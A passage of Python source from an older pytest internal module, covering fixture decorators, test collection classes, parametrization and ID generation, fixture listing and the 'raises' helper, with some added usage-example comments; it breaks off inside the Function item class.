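# Illustrative usage sketch (added for clarity, not part of the original module):
# a fixture defined with the decorator above and consumed by a test through its
# argument name. The "db_connection" name and the sqlite3 resource are examples
# only.
#
#     import sqlite3
#     import pytest
#
#     @pytest.fixture(scope="module")
#     def db_connection():
#         return sqlite3.connect(":memory:")
#
#     def test_select_one(db_connection):
#         assert db_connection.execute("select 1").fetchone() == (1,)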
def yield_fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a yield-fixture factory function
(EXPERIMENTAL).
This takes the same arguments as :py:func:`pytest.fixture` but
expects a fixture function to use a ``yield`` instead of a ``return``
statement to provide a fixture. See
http://pytest.org/en/latest/yieldfixture.html for more info.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse, yieldctx=True)(scope)
else:
return FixtureFunctionMarker(scope, params, autouse,
yieldctx=True, ids=ids)
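# Illustrative usage sketch (added for clarity, not part of the original module):
# with the yield-style variant the code after ``yield`` runs as teardown once the
# last test using the fixture has finished. Names are examples only.
#
#     @pytest.yield_fixture
#     def managed_resource():
#         resource = {"open": True}
#         yield resource            # value handed to the test
#         resource["open"] = False  # teardown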
defaultfuncargprefixmarker = fixture()
def pyobj_property(name):
def get(self):
node = self.getparent(getattr(pytest, name))
if node is not None:
return node.obj
doc = "python %s object this node was collected from (can be None)." % (
name.lower(),)
return property(get, None, None, doc)
def pytest_addoption(parser):
group = parser.getgroup("general")
group.addoption('--fixtures', '--funcargs',
action="store_true", dest="showfixtures", default=False,
help="show available fixtures, sorted by plugin appearance")
parser.addini("usefixtures", type="args", default=[],
help="list of default fixtures to be used with this project")
parser.addini("python_files", type="args",
default=['test_*.py', '*_test.py'],
help="glob-style file patterns for Python test module discovery")
parser.addini("python_classes", type="args", default=["Test",],
help="prefixes or glob names for Python test class discovery")
parser.addini("python_functions", type="args", default=["test",],
help="prefixes or glob names for Python test function and "
"method discovery")
def pytest_cmdline_main(config):
if config.option.showfixtures:
showfixtures(config)
return 0
def pytest_generate_tests(metafunc):
# those alternative spellings are common - raise a specific error to alert
# the user
alt_spellings = ['parameterize', 'parametrise', 'parameterise']
for attr in alt_spellings:
if hasattr(metafunc.function, attr):
msg = "{0} has '{1}', spelling should be 'parametrize'"
raise MarkerError(msg.format(metafunc.function.__name__, attr))
try:
markers = metafunc.function.parametrize
except AttributeError:
return
for marker in markers:
metafunc.parametrize(*marker.args, **marker.kwargs)
def pytest_configure(config):
config.addinivalue_line("markers",
"parametrize(argnames, argvalues): call a test function multiple "
"times passing in different arguments in turn. argvalues generally "
"needs to be a list of values if argnames specifies only one name "
"or a list of tuples of values if argnames specifies multiple names. "
"Example: @parametrize('arg1', [1,2]) would lead to two calls of the "
"decorated test function, one with arg1=1 and another with arg1=2."
"see http://pytest.org/latest/parametrize.html for more info and "
"examples."
)
config.addinivalue_line("markers",
"usefixtures(fixturename1, fixturename2, ...): mark tests as needing "
"all of the specified fixtures. see http://pytest.org/latest/fixture.html#usefixtures "
)
def pytest_sessionstart(session):
session._fixturemanager = FixtureManager(session)
@pytest.hookimpl(trylast=True)
def pytest_namespace():
raises.Exception = pytest.fail.Exception
return {
'fixture': fixture,
'yield_fixture': yield_fixture,
'raises' : raises,
'collect': {
'Module': Module, 'Class': Class, 'Instance': Instance,
'Function': Function, 'Generator': Generator,
'_fillfuncargs': fillfixtures}
}
@fixture(scope="session")
def pytestconfig(request):
""" the pytest config object with access to command line opts."""
return request.config
@pytest.hookimpl(trylast=True)
def pytest_pyfunc_call(pyfuncitem):
testfunction = pyfuncitem.obj
if pyfuncitem._isyieldedfunction():
testfunction(*pyfuncitem._args)
else:
funcargs = pyfuncitem.funcargs
testargs = {}
for arg in pyfuncitem._fixtureinfo.argnames:
testargs[arg] = funcargs[arg]
testfunction(**testargs)
return True
def pytest_collect_file(path, parent):
ext = path.ext
if ext == ".py":
if not parent.session.isinitpath(path):
for pat in parent.config.getini('python_files'):
if path.fnmatch(pat):
break
else:
return
ihook = parent.session.gethookproxy(path)
return ihook.pytest_pycollect_makemodule(path=path, parent=parent)
def pytest_pycollect_makemodule(path, parent):
return Module(path, parent)
@pytest.hookimpl(hookwrapper=True)
def pytest_pycollect_makeitem(collector, name, obj):
outcome = yield
res = outcome.get_result()
if res is not None:
raise StopIteration
# nothing was collected elsewhere, let's do it here
if isclass(obj):
if collector.istestclass(obj, name):
Class = collector._getcustomclass("Class")
outcome.force_result(Class(name, parent=collector))
elif collector.istestfunction(obj, name):
# mock seems to store unbound methods (issue473), normalize it
obj = getattr(obj, "__func__", obj)
if not isfunction(obj):
collector.warn(code="C2", message=
"cannot collect %r because it is not a function."
% name, )
if getattr(obj, "__test__", True):
if is_generator(obj):
res = Generator(name, parent=collector)
else:
res = list(collector._genfunctions(name, obj))
outcome.force_result(res)
def is_generator(func):
try:
return py.code.getrawcode(func).co_flags & 32 # generator function
except AttributeError: # builtin functions have no bytecode
# assume them to not be generators
return False
class PyobjContext(object):
module = pyobj_property("Module")
cls = pyobj_property("Class")
instance = pyobj_property("Instance")
class PyobjMixin(PyobjContext):
def obj():
def fget(self):
try:
return self._obj
except AttributeError:
self._obj = obj = self._getobj()
return obj
def fset(self, value):
self._obj = value
return property(fget, fset, None, "underlying python object")
obj = obj()
def _getobj(self):
return getattr(self.parent.obj, self.name)
def getmodpath(self, stopatmodule=True, includemodule=False):
""" return python path relative to the containing module. """
chain = self.listchain()
chain.reverse()
parts = []
for node in chain:
if isinstance(node, Instance):
continue
name = node.name
if isinstance(node, Module):
assert name.endswith(".py")
name = name[:-3]
if stopatmodule:
if includemodule:
parts.append(name)
break
parts.append(name)
parts.reverse()
s = ".".join(parts)
return s.replace(".[", "[")
def _getfslineno(self):
return getfslineno(self.obj)
def reportinfo(self):
# XXX caching?
obj = self.obj
if hasattr(obj, 'compat_co_firstlineno'):
# nose compatibility
fspath = sys.modules[obj.__module__].__file__
if fspath.endswith(".pyc"):
fspath = fspath[:-1]
lineno = obj.compat_co_firstlineno
else:
fspath, lineno = getfslineno(obj)
modpath = self.getmodpath()
assert isinstance(lineno, int)
return fspath, lineno, modpath
class PyCollector(PyobjMixin, pytest.Collector):
def funcnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_functions', name)
def isnosetest(self, obj):
""" Look for the __test__ attribute, which is applied by the
@nose.tools.istest decorator
"""
return safe_getattr(obj, '__test__', False)
def classnamefilter(self, name):
return self._matches_prefix_or_glob_option('python_classes', name)
def istestfunction(self, obj, name):
return (
(self.funcnamefilter(name) or self.isnosetest(obj))
and safe_getattr(obj, "__call__", False) and getfixturemarker(obj) is None
)
def istestclass(self, obj, name):
return self.classnamefilter(name) or self.isnosetest(obj)
def _matches_prefix_or_glob_option(self, option_name, name):
"""
checks if the given name matches the prefix or glob-pattern defined
in ini configuration.
"""
for option in self.config.getini(option_name):
if name.startswith(option):
return True
# check that name looks like a glob-string before calling fnmatch
# because this is called for every name in each collected module,
# and fnmatch is somewhat expensive to call
elif ('*' in option or '?' in option or '[' in option) and \
fnmatch.fnmatch(name, option):
return True
return False
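    # Illustrative examples (added for clarity, not part of the original module)
    # of the matching above, assuming ``python_functions = test check_*``:
    # "test_foo" matches via the "test" prefix, "check_api" matches via the
    # "check_*" glob (i.e. fnmatch.fnmatch("check_api", "check_*") is True),
    # and "helper" matches neither.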
def collect(self):
if not getattr(self.obj, "__test__", True):
return []
# NB. we avoid random getattrs and peek in the __dict__ instead
# (XXX originally introduced from a PyPy need, still true?)
dicts = [getattr(self.obj, '__dict__', {})]
for basecls in inspect.getmro(self.obj.__class__):
dicts.append(basecls.__dict__)
seen = {}
l = []
for dic in dicts:
for name, obj in dic.items():
if name in seen:
continue
seen[name] = True
res = self.makeitem(name, obj)
if res is None:
continue
if not isinstance(res, list):
res = [res]
l.extend(res)
l.sort(key=lambda item: item.reportinfo()[:2])
return l
def makeitem(self, name, obj):
#assert self.ihook.fspath == self.fspath, self
return self.ihook.pytest_pycollect_makeitem(
collector=self, name=name, obj=obj)
def _genfunctions(self, name, funcobj):
module = self.getparent(Module).obj
clscol = self.getparent(Class)
cls = clscol and clscol.obj or None
transfer_markers(funcobj, cls, module)
fm = self.session._fixturemanager
fixtureinfo = fm.getfixtureinfo(self, funcobj, cls)
metafunc = Metafunc(funcobj, fixtureinfo, self.config,
cls=cls, module=module)
methods = []
if hasattr(module, "pytest_generate_tests"):
methods.append(module.pytest_generate_tests)
if hasattr(cls, "pytest_generate_tests"):
methods.append(cls().pytest_generate_tests)
if methods:
self.ihook.pytest_generate_tests.call_extra(methods,
dict(metafunc=metafunc))
else:
self.ihook.pytest_generate_tests(metafunc=metafunc)
Function = self._getcustomclass("Function")
if not metafunc._calls:
yield Function(name, parent=self, fixtureinfo=fixtureinfo)
else:
# add funcargs() as fixturedefs to fixtureinfo.arg2fixturedefs
add_funcarg_pseudo_fixture_def(self, metafunc, fm)
for callspec in metafunc._calls:
subname = "%s[%s]" %(name, callspec.id)
yield Function(name=subname, parent=self,
callspec=callspec, callobj=funcobj,
fixtureinfo=fixtureinfo,
keywords={callspec.id:True})
def add_funcarg_pseudo_fixture_def(collector, metafunc, fixturemanager):
    # this function will transform all collected calls to a function
# if they use direct funcargs (i.e. direct parametrization)
# because we want later test execution to be able to rely on
# an existing FixtureDef structure for all arguments.
# XXX we can probably avoid this algorithm if we modify CallSpec2
# to directly care for creating the fixturedefs within its methods.
if not metafunc._calls[0].funcargs:
return # this function call does not have direct parametrization
# collect funcargs of all callspecs into a list of values
arg2params = {}
arg2scope = {}
for callspec in metafunc._calls:
for argname, argvalue in callspec.funcargs.items():
assert argname not in callspec.params
callspec.params[argname] = argvalue
arg2params_list = arg2params.setdefault(argname, [])
callspec.indices[argname] = len(arg2params_list)
arg2params_list.append(argvalue)
if argname not in arg2scope:
scopenum = callspec._arg2scopenum.get(argname,
scopenum_function)
arg2scope[argname] = scopes[scopenum]
callspec.funcargs.clear()
# register artificial FixtureDef's so that later at test execution
# time we can rely on a proper FixtureDef to exist for fixture setup.
arg2fixturedefs = metafunc._arg2fixturedefs
for argname, valuelist in arg2params.items():
# if we have a scope that is higher than function we need
        # to make sure we only ever create a corresponding fixturedef on
# a per-scope basis. We thus store and cache the fixturedef on the
# node related to the scope.
scope = arg2scope[argname]
node = None
if scope != "function":
node = get_scope_node(collector, scope)
if node is None:
assert scope == "class" and isinstance(collector, Module)
# use module-level collector for class-scope (for now)
node = collector
if node and argname in node._name2pseudofixturedef:
arg2fixturedefs[argname] = [node._name2pseudofixturedef[argname]]
else:
fixturedef = FixtureDef(fixturemanager, '', argname,
get_direct_param_fixture_func,
arg2scope[argname],
valuelist, False, False)
arg2fixturedefs[argname] = [fixturedef]
if node is not None:
node._name2pseudofixturedef[argname] = fixturedef
def get_direct_param_fixture_func(request):
return request.param
class FuncFixtureInfo:
def __init__(self, argnames, names_closure, name2fixturedefs):
self.argnames = argnames
self.names_closure = names_closure
self.name2fixturedefs = name2fixturedefs
def _marked(func, mark):
""" Returns True if :func: is already marked with :mark:, False otherwise.
    This can happen if the marker is applied to a class and the test file is
invoked more than once.
"""
try:
func_mark = getattr(func, mark.name)
except AttributeError:
return False
return mark.args == func_mark.args and mark.kwargs == func_mark.kwargs
def transfer_markers(funcobj, cls, mod):
# XXX this should rather be code in the mark plugin or the mark
# plugin should merge with the python plugin.
for holder in (cls, mod):
try:
pytestmark = holder.pytestmark
except AttributeError:
continue
if isinstance(pytestmark, list):
for mark in pytestmark:
if not _marked(funcobj, mark):
mark(funcobj)
else:
if not _marked(funcobj, pytestmark):
pytestmark(funcobj)
class Module(pytest.File, PyCollector):
""" Collector for test classes and functions. """
def _getobj(self):
return self._memoizedcall('_obj', self._importtestmodule)
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Module, self).collect()
def _importtestmodule(self):
# we assume we are only called once per module
try:
mod = self.fspath.pyimport(ensuresyspath="append")
except SyntaxError:
raise self.CollectError(
py.code.ExceptionInfo().getrepr(style="short"))
except self.fspath.ImportMismatchError:
e = sys.exc_info()[1]
raise self.CollectError(
"import file mismatch:\n"
"imported module %r has this __file__ attribute:\n"
" %s\n"
"which is not the same as the test file we want to collect:\n"
" %s\n"
"HINT: remove __pycache__ / .pyc files and/or use a "
"unique basename for your test file modules"
% e.args
)
#print "imported test module", mod
self.config.pluginmanager.consider_module(mod)
return mod
def setup(self):
setup_module = xunitsetup(self.obj, "setUpModule")
if setup_module is None:
setup_module = xunitsetup(self.obj, "setup_module")
if setup_module is not None:
#XXX: nose compat hack, move to nose plugin
            # if it takes a positional arg, it's probably a pytest style one
# so we pass the current module object
if inspect.getargspec(setup_module)[0]:
setup_module(self.obj)
else:
setup_module()
fin = getattr(self.obj, 'tearDownModule', None)
if fin is None:
fin = getattr(self.obj, 'teardown_module', None)
if fin is not None:
#XXX: nose compat hack, move to nose plugin
# if it takes a positional arg, it's probably a pytest style one
# so we pass the current module object
if inspect.getargspec(fin)[0]:
finalizer = lambda: fin(self.obj)
else:
finalizer = fin
self.addfinalizer(finalizer)
class Class(PyCollector):
""" Collector for test methods. """
def collect(self):
if hasinit(self.obj):
self.warn("C1", "cannot collect test class %r because it has a "
"__init__ constructor" % self.obj.__name__)
return []
return [self._getcustomclass("Instance")(name="()", parent=self)]
def setup(self):
setup_class = xunitsetup(self.obj, 'setup_class')
if setup_class is not None:
setup_class = getattr(setup_class, 'im_func', setup_class)
setup_class = getattr(setup_class, '__func__', setup_class)
setup_class(self.obj)
fin_class = getattr(self.obj, 'teardown_class', None)
if fin_class is not None:
fin_class = getattr(fin_class, 'im_func', fin_class)
fin_class = getattr(fin_class, '__func__', fin_class)
self.addfinalizer(lambda: fin_class(self.obj))
class Instance(PyCollector):
def _getobj(self):
obj = self.parent.obj()
return obj
def collect(self):
self.session._fixturemanager.parsefactories(self)
return super(Instance, self).collect()
def newinstance(self):
self.obj = self._getobj()
return self.obj
class FunctionMixin(PyobjMixin):
""" mixin for the code common to Function and Generator.
"""
def setup(self):
""" perform setup for this test function. """
if hasattr(self, '_preservedparent'):
obj = self._preservedparent
elif isinstance(self.parent, Instance):
obj = self.parent.newinstance()
self.obj = self._getobj()
else:
obj = self.parent.obj
if inspect.ismethod(self.obj):
setup_name = 'setup_method'
teardown_name = 'teardown_method'
else:
setup_name = 'setup_function'
teardown_name = 'teardown_function'
setup_func_or_method = xunitsetup(obj, setup_name)
if setup_func_or_method is not None:
setup_func_or_method(self.obj)
fin = getattr(obj, teardown_name, None)
if fin is not None:
self.addfinalizer(lambda: fin(self.obj))
def _prunetraceback(self, excinfo):
if hasattr(self, '_obj') and not self.config.option.fulltrace:
code = py.code.Code(get_real_func(self.obj))
path, firstlineno = code.path, code.firstlineno
traceback = excinfo.traceback
ntraceback = traceback.cut(path=path, firstlineno=firstlineno)
if ntraceback == traceback:
ntraceback = ntraceback.cut(path=path)
if ntraceback == traceback:
#ntraceback = ntraceback.cut(excludepath=cutdir2)
ntraceback = ntraceback.filter(filter_traceback)
if not ntraceback:
ntraceback = traceback
excinfo.traceback = ntraceback.filter()
# issue364: mark all but first and last frames to
# only show a single-line message for each frame
if self.config.option.tbstyle == "auto":
if len(excinfo.traceback) > 2:
for entry in excinfo.traceback[1:-1]:
entry.set_repr_style('short')
def _repr_failure_py(self, excinfo, style="long"):
if excinfo.errisinstance(pytest.fail.Exception):
if not excinfo.value.pytrace:
return str(excinfo.value)
return super(FunctionMixin, self)._repr_failure_py(excinfo,
style=style)
def repr_failure(self, excinfo, outerr=None):
assert outerr is None, "XXX outerr usage is deprecated"
style = self.config.option.tbstyle
if style == "auto":
style = "long"
return self._repr_failure_py(excinfo, style=style)
class Generator(FunctionMixin, PyCollector):
def collect(self):
# test generators are seen as collectors but they also
        # invoke setup/teardown by popular request
# (induced by the common "test_*" naming shared with normal tests)
self.session._setupstate.prepare(self)
# see FunctionMixin.setup and test_setupstate_is_preserved_134
self._preservedparent = self.parent.obj
l = []
seen = {}
for i, x in enumerate(self.obj()):
name, call, args = self.getcallargs(x)
if not callable(call):
raise TypeError("%r yielded non callable test %r" %(self.obj, call,))
if name is None:
name = "[%d]" % i
else:
name = "['%s']" % name
if name in seen:
raise ValueError("%r generated tests with non-unique name %r" %(self, name))
seen[name] = True
l.append(self.Function(name, self, args=args, callobj=call))
return l
def getcallargs(self, obj):
if not isinstance(obj, (tuple, list)):
obj = (obj,)
        # explicit naming
if isinstance(obj[0], py.builtin._basestring):
name = obj[0]
obj = obj[1:]
else:
name = None
call, args = obj[0], obj[1:]
return name, call, args
def hasinit(obj):
init = getattr(obj, '__init__', None)
if init:
if init != object.__init__:
return True
def fillfixtures(function):
""" fill missing funcargs for a test function. """
try:
request = function._request
except AttributeError:
# XXX this special code path is only expected to execute
# with the oejskit plugin. It uses classes with funcargs
# and we thus have to work a bit to allow this.
fm = function.session._fixturemanager
fi = fm.getfixtureinfo(function.parent, function.obj, None)
function._fixtureinfo = fi
request = function._request = FixtureRequest(function)
request._fillfixtures()
# prune out funcargs for jstests
newfuncargs = {}
for name in fi.argnames:
newfuncargs[name] = function.funcargs[name]
function.funcargs = newfuncargs
else:
request._fillfixtures()
_notexists = object()
class CallSpec2(object):
def __init__(self, metafunc):
self.metafunc = metafunc
self.funcargs = {}
self._idlist = []
self.params = {}
self._globalid = _notexists
self._globalid_args = set()
self._globalparam = _notexists
self._arg2scopenum = {} # used for sorting parametrized resources
self.keywords = {}
self.indices = {}
def copy(self, metafunc):
cs = CallSpec2(self.metafunc)
cs.funcargs.update(self.funcargs)
cs.params.update(self.params)
cs.keywords.update(self.keywords)
cs.indices.update(self.indices)
cs._arg2scopenum.update(self._arg2scopenum)
cs._idlist = list(self._idlist)
cs._globalid = self._globalid
cs._globalid_args = self._globalid_args
cs._globalparam = self._globalparam
return cs
def _checkargnotcontained(self, arg):
if arg in self.params or arg in self.funcargs:
raise ValueError("duplicate %r" %(arg,))
def getparam(self, name):
try:
return self.params[name]
except KeyError:
if self._globalparam is _notexists:
raise ValueError(name)
return self._globalparam
@property
def id(self):
return "-".join(map(str, filter(None, self._idlist)))
def setmulti(self, valtype, argnames, valset, id, keywords, scopenum,
param_index):
for arg,val in zip(argnames, valset):
self._checkargnotcontained(arg)
getattr(self, valtype)[arg] = val
self.indices[arg] = param_index
self._arg2scopenum[arg] = scopenum
if val is _notexists:
self._emptyparamspecified = True
self._idlist.append(id)
self.keywords.update(keywords)
def setall(self, funcargs, id, param):
for x in funcargs:
self._checkargnotcontained(x)
self.funcargs.update(funcargs)
if id is not _notexists:
self._idlist.append(id)
if param is not _notexists:
assert self._globalparam is _notexists
self._globalparam = param
for arg in funcargs:
self._arg2scopenum[arg] = scopenum_function
class FuncargnamesCompatAttr:
""" helper class so that Metafunc, Function and FixtureRequest
don't need to each define the "funcargnames" compatibility attribute.
"""
@property
def funcargnames(self):
""" alias attribute for ``fixturenames`` for pre-2.3 compatibility"""
return self.fixturenames
class Metafunc(FuncargnamesCompatAttr):
"""
Metafunc objects are passed to the ``pytest_generate_tests`` hook.
They help to inspect a test function and to generate tests according to
test configuration or values specified in the class or module where a
test function is defined.
:ivar fixturenames: set of fixture names required by the test function
:ivar function: underlying python test function
:ivar cls: class object where the test function is defined in or ``None``.
:ivar module: the module object where the test function is defined in.
:ivar config: access to the :class:`_pytest.config.Config` object for the
test session.
:ivar funcargnames:
.. deprecated:: 2.3
Use ``fixturenames`` instead.
"""
def __init__(self, function, fixtureinfo, config, cls=None, module=None):
self.config = config
self.module = module
self.function = function
self.fixturenames = fixtureinfo.names_closure
self._arg2fixturedefs = fixtureinfo.name2fixturedefs
self.cls = cls
self._calls = []
self._ids = py.builtin.set()
def parametrize(self, argnames, argvalues, indirect=False, ids=None,
scope=None):
""" Add new invocations to the underlying test function using the list
of argvalues for the given argnames. Parametrization is performed
        during the collection phase. If you need to set up expensive resources,
        consider setting indirect=True to do so at test setup time instead.
:arg argnames: a comma-separated string denoting one or more argument
names, or a list/tuple of argument strings.
:arg argvalues: The list of argvalues determines how often a
test is invoked with different argument values. If only one
argname was specified argvalues is a list of simple values. If N
argnames were specified, argvalues must be a list of N-tuples,
where each tuple-element specifies a value for its respective
argname.
:arg indirect: if True each argvalue corresponding to an argname will
be passed as request.param to its respective argname fixture
function so that it can perform more expensive setups during the
setup phase of a test rather than at collection time.
:arg ids: list of string ids, or a callable.
            If strings, each corresponds to an argvalue so that they are
part of the test id.
If callable, it should take one argument (a single argvalue) and return
a string or return None. If None, the automatically generated id for that
argument will be used.
If no ids are provided they will be generated automatically from
the argvalues.
:arg scope: if specified it denotes the scope of the parameters.
The scope is used for grouping tests by parameter instances.
            It will also override any fixture-function defined scope, allowing
            a dynamic scope to be set using test context or configuration.
"""
# individual parametrized argument sets can be wrapped in a series
# of markers in which case we unwrap the values and apply the mark
# at Function init
newkeywords = {}
unwrapped_argvalues = []
for i, argval in enumerate(argvalues):
while isinstance(argval, MarkDecorator):
newmark = MarkDecorator(argval.markname,
argval.args[:-1], argval.kwargs)
newmarks = newkeywords.setdefault(i, {})
newmarks[newmark.markname] = newmark
argval = argval.args[-1]
unwrapped_argvalues.append(argval)
argvalues = unwrapped_argvalues
if not isinstance(argnames, (tuple, list)):
argnames = [x.strip() for x in argnames.split(",") if x.strip()]
if len(argnames) == 1:
argvalues = [(val,) for val in argvalues]
if not argvalues:
argvalues = [(_notexists,) * len(argnames)]
if scope is None:
scope = "function"
scopenum = scopes.index(scope)
if not indirect:
#XXX should we also check for the opposite case?
for arg in argnames:
if arg not in self.fixturenames:
raise ValueError("%r uses no fixture %r" %(
self.function, arg))
valtype = indirect and "params" or "funcargs"
idfn = None
if callable(ids):
idfn = ids
ids = None
if ids and len(ids) != len(argvalues):
raise ValueError('%d tests specified with %d ids' %(
len(argvalues), len(ids)))
if not ids:
ids = idmaker(argnames, argvalues, idfn)
newcalls = []
for callspec in self._calls or [CallSpec2(self)]:
for param_index, valset in enumerate(argvalues):
assert len(valset) == len(argnames)
newcallspec = callspec.copy(self)
newcallspec.setmulti(valtype, argnames, valset, ids[param_index],
newkeywords.get(param_index, {}), scopenum,
param_index)
newcalls.append(newcallspec)
self._calls = newcalls
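    # Illustrative usage sketch (added for clarity, not part of the original
    # module): the same machinery is usually driven through the
    # ``pytest.mark.parametrize`` decorator; the values are examples only.
    #
    #     @pytest.mark.parametrize("base, exponent, expected", [
    #         (2, 3, 8),
    #         (10, 0, 1),
    #     ])
    #     def test_pow(base, exponent, expected):
    #         assert base ** exponent == expected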
def addcall(self, funcargs=None, id=_notexists, param=_notexists):
""" (deprecated, use parametrize) Add a new call to the underlying
test function during the collection phase of a test run. Note that
        addcall() is called during the test collection phase, prior to
        and independently of actual test execution. You should only use addcall()
if you need to specify multiple arguments of a test function.
:arg funcargs: argument keyword dictionary used when invoking
the test function.
:arg id: used for reporting and identification purposes. If you
don't supply an `id` an automatic unique id will be generated.
:arg param: a parameter which will be exposed to a later fixture function
invocation through the ``request.param`` attribute.
"""
assert funcargs is None or isinstance(funcargs, dict)
if funcargs is not None:
for name in funcargs:
if name not in self.fixturenames:
pytest.fail("funcarg %r not used in this function." % name)
else:
funcargs = {}
if id is None:
raise ValueError("id=None not allowed")
if id is _notexists:
id = len(self._calls)
id = str(id)
if id in self._ids:
raise ValueError("duplicate id %r" % id)
self._ids.add(id)
cs = CallSpec2(self)
cs.setall(funcargs, id, param)
self._calls.append(cs)
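# Illustrative usage sketch (added for clarity, not part of the original module)
# of the deprecated addcall() API from a pytest_generate_tests hook; parametrize()
# above is the preferred replacement. "numiter" is an example fixture name only.
#
#     def pytest_generate_tests(metafunc):
#         if "numiter" in metafunc.fixturenames:
#             for i in range(3):
#                 metafunc.addcall(funcargs=dict(numiter=i))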
def _idval(val, argname, idx, idfn):
if idfn:
try:
s = idfn(val)
if s:
return s
except Exception:
pass
if isinstance(val, (float, int, str, bool, NoneType)):
return str(val)
elif isinstance(val, REGEX_TYPE):
return val.pattern
elif enum is not None and isinstance(val, enum.Enum):
return str(val)
elif isclass(val) and hasattr(val, '__name__'):
return val.__name__
return str(argname)+str(idx)
def _idvalset(idx, valset, argnames, idfn):
this_id = [_idval(val, argname, idx, idfn)
for val, argname in zip(valset, argnames)]
return "-".join(this_id)
def idmaker(argnames, argvalues, idfn=None):
ids = [_idvalset(valindex, valset, argnames, idfn)
for valindex, valset in enumerate(argvalues)]
if len(set(ids)) < len(ids):
# user may have provided a bad idfn which means the ids are not unique
ids = [str(i) + testid for i, testid in enumerate(ids)]
return ids
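# Illustrative examples (added for clarity, not part of the original module) of
# the ids generated above:
#
#     >>> idmaker(("a",), [(1,), (2,)])
#     ['1', '2']
#     >>> idmaker(("a", "b"), [(object(), object())])
#     ['a0-b0']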
def showfixtures(config):
from _pytest.main import wrap_session
return wrap_session(config, _showfixtures_main)
def _showfixtures_main(config, session):
import _pytest.config
session.perform_collect()
curdir = py.path.local()
tw = _pytest.config.create_terminal_writer(config)
verbose = config.getvalue("verbose")
fm = session._fixturemanager
available = []
for argname, fixturedefs in fm._arg2fixturedefs.items():
assert fixturedefs is not None
if not fixturedefs:
continue
fixturedef = fixturedefs[-1]
loc = getlocation(fixturedef.func, curdir)
available.append((len(fixturedef.baseid),
fixturedef.func.__module__,
curdir.bestrelpath(loc),
fixturedef.argname, fixturedef))
available.sort()
currentmodule = None
for baseid, module, bestrel, argname, fixturedef in available:
if currentmodule != module:
if not module.startswith("_pytest."):
tw.line()
tw.sep("-", "fixtures defined from %s" %(module,))
currentmodule = module
if verbose <= 0 and argname[0] == "_":
continue
if verbose > 0:
funcargspec = "%s -- %s" %(argname, bestrel,)
else:
funcargspec = argname
tw.line(funcargspec, green=True)
loc = getlocation(fixturedef.func, curdir)
doc = fixturedef.func.__doc__ or ""
if doc:
for line in doc.strip().split("\n"):
tw.line(" " + line.strip())
else:
tw.line(" %s: no docstring available" %(loc,),
red=True)
def getlocation(function, curdir):
import inspect
fn = py.path.local(inspect.getfile(function))
lineno = py.builtin._getcode(function).co_firstlineno
if fn.relto(curdir):
fn = fn.relto(curdir)
return "%s:%d" %(fn, lineno+1)
# builtin pytest.raises helper
def raises(expected_exception, *args, **kwargs):
""" assert that a code block/function call raises @expected_exception
and raise a failure exception otherwise.
This helper produces a ``py.code.ExceptionInfo()`` object.
If using Python 2.5 or above, you may use this function as a
context manager::
>>> with raises(ZeroDivisionError):
... 1/0
Or you can specify a callable by passing a to-be-called lambda::
>>> raises(ZeroDivisionError, lambda: 1/0)
<ExceptionInfo ...>
or you can specify an arbitrary callable with arguments::
>>> def f(x): return 1/x
...
>>> raises(ZeroDivisionError, f, 0)
<ExceptionInfo ...>
>>> raises(ZeroDivisionError, f, x=0)
<ExceptionInfo ...>
A third possibility is to use a string to be executed::
>>> raises(ZeroDivisionError, "f(0)")
<ExceptionInfo ...>
Performance note:
-----------------
Similar to caught exception objects in Python, explicitly clearing
local references to returned ``py.code.ExceptionInfo`` objects can
help the Python interpreter speed up its garbage collection.
Clearing those references breaks a reference cycle
(``ExceptionInfo`` --> caught exception --> frame stack raising
the exception --> current frame stack --> local variables -->
``ExceptionInfo``) which makes Python keep all objects referenced
from that cycle (including all local variables in the current
frame) alive until the next cyclic garbage collection run. See the
official Python ``try`` statement documentation for more detailed
information.
"""
__tracebackhide__ = True
if expected_exception is AssertionError:
# we want to catch a AssertionError
# replace our subclass with the builtin one
# see https://github.com/pytest-dev/pytest/issues/176
from _pytest.assertion.util import BuiltinAssertionError \
as expected_exception
msg = ("exceptions must be old-style classes or"
" derived from BaseException, not %s")
if isinstance(expected_exception, tuple):
for exc in expected_exception:
if not isclass(exc):
raise TypeError(msg % type(exc))
elif not isclass(expected_exception):
raise TypeError(msg % type(expected_exception))
if not args:
return RaisesContext(expected_exception)
elif isinstance(args[0], str):
code, = args
assert isinstance(code, str)
frame = sys._getframe(1)
loc = frame.f_locals.copy()
loc.update(kwargs)
#print "raises frame scope: %r" % frame.f_locals
try:
code = py.code.Source(code).compile()
py.builtin.exec_(code, frame.f_globals, loc)
            # XXX didn't f_globals == f_locals mean something special?
# this is destroyed here ...
except expected_exception:
return py.code.ExceptionInfo()
else:
func = args[0]
try:
func(*args[1:], **kwargs)
except expected_exception:
return py.code.ExceptionInfo()
pytest.fail("DID NOT RAISE")
class RaisesContext(object):
def __init__(self, expected_exception):
self.expected_exception = expected_exception
self.excinfo = None
def __enter__(self):
self.excinfo = object.__new__(py.code.ExceptionInfo)
return self.excinfo
def __exit__(self, *tp):
__tracebackhide__ = True
if tp[0] is None:
pytest.fail("DID NOT RAISE")
if sys.version_info < (2, 7):
# py26: on __exit__() exc_value often does not contain the
# exception value.
# http://bugs.python.org/issue7853
if not isinstance(tp[1], BaseException):
exc_type, value, traceback = tp
tp = exc_type, exc_type(value), traceback
self.excinfo.__init__(tp)
return issubclass(self.excinfo.type, self.expected_exception)
#
# the basic pytest Function item
#
class Function(FunctionMixin, pytest.Item, FuncargnamesCompatAttr):
""" a Function Item is responsible for setting up and executing a
Python test function.
"""
_genid = None
def __init__(self, name, parent, args=None, config=None,
callspec=None, callobj=NOTSET, keywords=None, session=None,
fixtureinfo=None):
super(Function, self).__init__(name, parent, config=config,
session=session)
self._args = args
if callobj is not NOTSET:
self.obj = callobj
self.keywords.update(self.obj.__dict__)
if callspec:
self.callspec = callspec
self.keywords.update(callspec.keywords)
if keywords:
self.keywords.update(keywords)
if fixtureinfo is None:
fixtureinfo = self.session._fixturemanager.getfixtureinfo(
self.parent, self.obj, self.cls,
funcargs=not self._isyieldedfunction())
self._fixtureinfo = fixtureinfo
self.fixturenames = fixtureinfo.names_closure
self._initrequest()
def _initrequest(self):
self.funcargs = {}
if self._isyieldedfunction():
assert not hasattr(self, "callspec"), (
"yielded functions (deprecated) cannot have funcargs")
else:
